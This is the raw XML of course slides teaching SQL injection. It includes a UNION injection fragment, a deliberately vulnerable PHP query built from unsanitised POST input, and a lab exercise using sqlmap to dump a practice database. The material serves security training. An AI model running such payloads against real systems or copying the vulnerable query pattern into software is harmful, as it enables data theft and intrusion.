                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> FROM users;-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$name = $_POST[“name”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query = “SELECT first, last FROM users WHERE name=‘$name’;”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2157402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rgbClr val="F8B041"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UNION Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91466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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8B041"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8B041"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="455786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dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to dump information from a vulnerable database. The series of commands you’ll use is straight from a professional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pentester’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> workflow, so learn it well!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" u="sng"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Launch the Docker container equipped with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run -it --rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cyberxsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/alpine-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Navigate to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ptl-f99df351-3bdd4c8f.libcurl.so/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Explore the site, and identify a potential SQL injection point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to extract the data specified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sent via Slack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (20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83323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Dumping Databases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3367174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7086601" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="688146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028BFD-AFBF-4EF2-AA2A-EDCADA19AAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll use DB Fiddle to review SELECT WHERE statements. This will prepare you to study  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In-Band SQL injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, the core topic of the day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Load the fiddle at: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.db-fiddle.com/f/upnxDj1JbZyQeG7BKNqAUL/0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Select all users whose last name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Doe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Select all users whose last name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Doe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Competent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Select all users whose first name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> whose password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asdf772nx</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Answer the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> provided via Slack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4081C5-5AC8-4193-97CA-7B6CB059A5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: SQL Warm-Up (15 min.)</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444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7679A2-3DCD-4936-B1B1-7687A3AB22B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="64008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654CCC-5D12-4893-B724-BE742EBF039E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2459504"/>
            <a:ext cx="8686800" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Warm-Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2818690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199" y="3029740"/>
            <a:ext cx="6869289" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3209836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9FE0-390B-3E4F-8161-E2A0F35DF69F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injections </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6DDDEC1-A565-0848-9EDA-DBE24C09005D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="914400"/>
            <a:ext cx="8001000" cy="5386090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injections occur when users submit malicious input that the server uses to perform a database query.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attackers can use SQL injections for the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Getting root shells on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Stealing sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Forging data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632069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4C19C4-9CCF-459F-9773-721076B3D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799" y="4114799"/>
            <a:ext cx="1656451" cy="1983139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64E8C43-A46E-4038-BEE4-3DFF53503FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
